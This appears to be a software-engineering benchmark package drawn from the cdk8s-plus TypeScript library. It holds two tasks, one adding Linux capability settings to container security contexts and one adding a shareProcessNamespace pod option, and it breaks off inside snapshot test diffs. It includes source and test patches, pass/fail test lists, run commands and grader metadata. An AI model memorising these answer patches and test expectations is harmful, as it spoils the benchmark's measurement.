false; + this.capabilities = props.capabilities; } /** @@ -158,6 +349,7 @@ export class ContainerSecurityContext { privileged: this.privileged, readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, + capabilities: this.capabilities, }; } @@ -330,7 +522,7 @@ export class EnvValue { * @param key - The key to extract the value from. * @param options - Additional options. */ - public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = { }): EnvValue { + public static fromConfigMap(configMap: configmap.IConfigMap, key: string, options: EnvValueFromConfigMapOptions = {}): EnvValue { const source: k8s.EnvVarSource = { configMapKeyRef: { @@ -432,7 +624,7 @@ export class EnvValue { return EnvValue.fromValue(value!); } - private constructor(public readonly value?: any, public readonly valueFrom?: any) {} + private constructor(public readonly value?: any, public readonly valueFrom?: any) { } } export enum ImagePullPolicy { @@ -810,7 +1002,7 @@ export class Container { * @param path - The desired path in the container. * @param storage - The storage to mount. */ - public mount(path: string, storage: volume.IStorage, options: MountOptions = { }) { + public mount(path: string, storage: volume.IStorage, options: MountOptions = {}) { this.mounts.push({ path, volume: storage.asVolume(), ...options }); } @@ -1094,7 +1286,7 @@ export class EnvFrom { constructor( private readonly configMap?: configmap.IConfigMap, private readonly prefix?: string, - private readonly sec?: secret.ISecret) {}; + private readonly sec?: secret.ISecret) { }; /** * @internal
feat(container): add capabilities to security context (#3817) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [feat(container): add capabilities to security context (#3817)](https://github.com/cdk8s-team/cdk8s-plus/pull/3817) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Expose POSIX capabilities in container security context **Problem** Users cannot currently specify which Linux capabilities a container should add or drop, limiting fine‑grained security configuration. The CDK8s Plus API therefore cannot express a common Kubernetes security feature. **Root Cause** The security‑context model lacked a property for capabilities, even though the underlying Kubernetes spec supports it. **Fix / Expected Behavior** - Introduce a comprehensive enumeration of POSIX capabilities. - Add a capability configuration object allowing explicit “add” and “drop” lists. - Extend the container security context properties to accept this capability configuration. - Ensure the capabilities are included in the generated pod spec when provided. - Preserve existing behavior when the property is omitted (no capabilities are set). **Risk & Validation** - The change adds only optional fields; existing manifests remain unchanged. - Verify that manifests generated with capabilities contain the correct `capabilities` block. - Run the full test suite and add tests for the new capability fields to guard against regressions.
4,055
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..13239370 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability } from '../src'; describe('EnvValue', () => { @@ -757,6 +757,7 @@ test('default security context', () => { runAsNonRoot: container.securityContext.ensureNonRoot, runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, + capabilities: container.securityContext.capabilities, }); }); @@ -770,6 +771,14 @@ test('custom security context', () => { privileged: true, user: 1000, group: 2000, + capabilities: { + add: [ + Capability.AUDIT_CONTROL, + ], + drop: [ + Capability.BPF, + ], + }, }, }); @@ -778,6 +787,8 @@ test('custom security context', () => { expect(container.securityContext.readOnlyRootFilesystem).toBeTruthy(); expect(container.securityContext.user).toEqual(1000); expect(container.securityContext.group).toEqual(2000); + expect(container.securityContext.capabilities?.add).toEqual(['CAP_AUDIT_CONTROL']); + expect(container.securityContext.capabilities?.drop).toEqual(['CAP_BPF']); });
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "defaultChild", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Can be isolated", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Can mutate metadata", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "Can be 
imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot 
create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Can be exposed as via ingress", "Expose 
uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend 
does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "default security context", "custom security context", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can 
specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define 
namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average 
utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer 
type", "can be exposed by an ingress" ]
Enum: Capability Location: src/container.ts Inputs: None (enum values are constants) Outputs: String values representing Linux POSIX capabilities, e.g., `CAP_AUDIT_CONTROL`, `CAP_BPF`, etc. Description: Enumeration of all supported POSIX capabilities that can be added to or dropped from a container's security context. Interface: ContainerSecutiryContextCapabilities Location: src/container.ts Inputs: - `add?`: optional array of `Capability` enums to add to the container. - `drop?`: optional array of `Capability` enums to remove from the container. Outputs: None (used as a data structure) Description: Defines the shape of the `capabilities` property in a `ContainerSecurityContext`, allowing callers to specify which capabilities to add or drop. Property: ContainerSecurityContext.capabilities Location: src/container.ts (class `ContainerSecurityContext`) Inputs: Optional `ContainerSecutiryContextCapabilities` object supplied via `ContainerSecurityContextProps.capabilities`. Outputs: The stored `ContainerSecutiryContextCapabilities` instance (or `undefined` if not set); accessible via `container.securityContext.capabilities`. Description: Exposes the POSIX capabilities configuration for a container's security context, enabling tests to verify added or dropped capabilities.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 196, "pr_author": "iliapolo", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3817", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding POSIX capabilities to a container's security context, and the test patch checks that the enum and properties are exported and serialized correctly. The provided tests align with the intended behavior (importing Capability, setting add/drop lists, and asserting their values), and no unrelated test failures are introduced. There are no signals of B‑category problems such as coupling, implicit naming, missing external info, ambiguous specs beyond the brief description, extra patch artifacts, or hidden domain knowledge. 
Hence the task is solvable and classified as high‑quality (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
9e268a1b70d50d7f264041a62ec838bb649f5599
2025-02-25 06:53:45
cdk8s-team__cdk8s-plus-5353
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. 
* You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace (backport #4902) # Backport This will backport the following commits from `k8s-31/main` to `k8s-29/main`: - [feat(pod): shareProcessNamespace (#4902)](https://github.com/cdk8s-team/cdk8s-plus/pull/4902) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add optional process‑namespace sharing to Pod constructs **Problem** The library does not expose Kubernetes’ `shareProcessNamespace` flag, preventing users from configuring pods so that containers share a single process namespace. **Root Cause** The Pod abstraction lacked a corresponding property and did not propagate the setting to the generated pod spec. **Fix / Expected Behavior** - Introduce an optional boolean flag on the pod configuration to enable process‑namespace sharing. - Default the flag to `false` to keep existing pods unchanged. - Include the flag in the rendered pod manifest under the correct field when enabled. - Update the public API documentation to describe the new option and reference Kubernetes guidance. **Risk & Validation** - Verify that the default `false` preserves backward compatibility for all existing deployments. - Add tests to confirm that the manifest contains `shareProcessNamespace: true` only when the flag is set. - Run the full test suite to ensure no regression in pod creation or other resource handling.
5,353
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ 
"runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, 
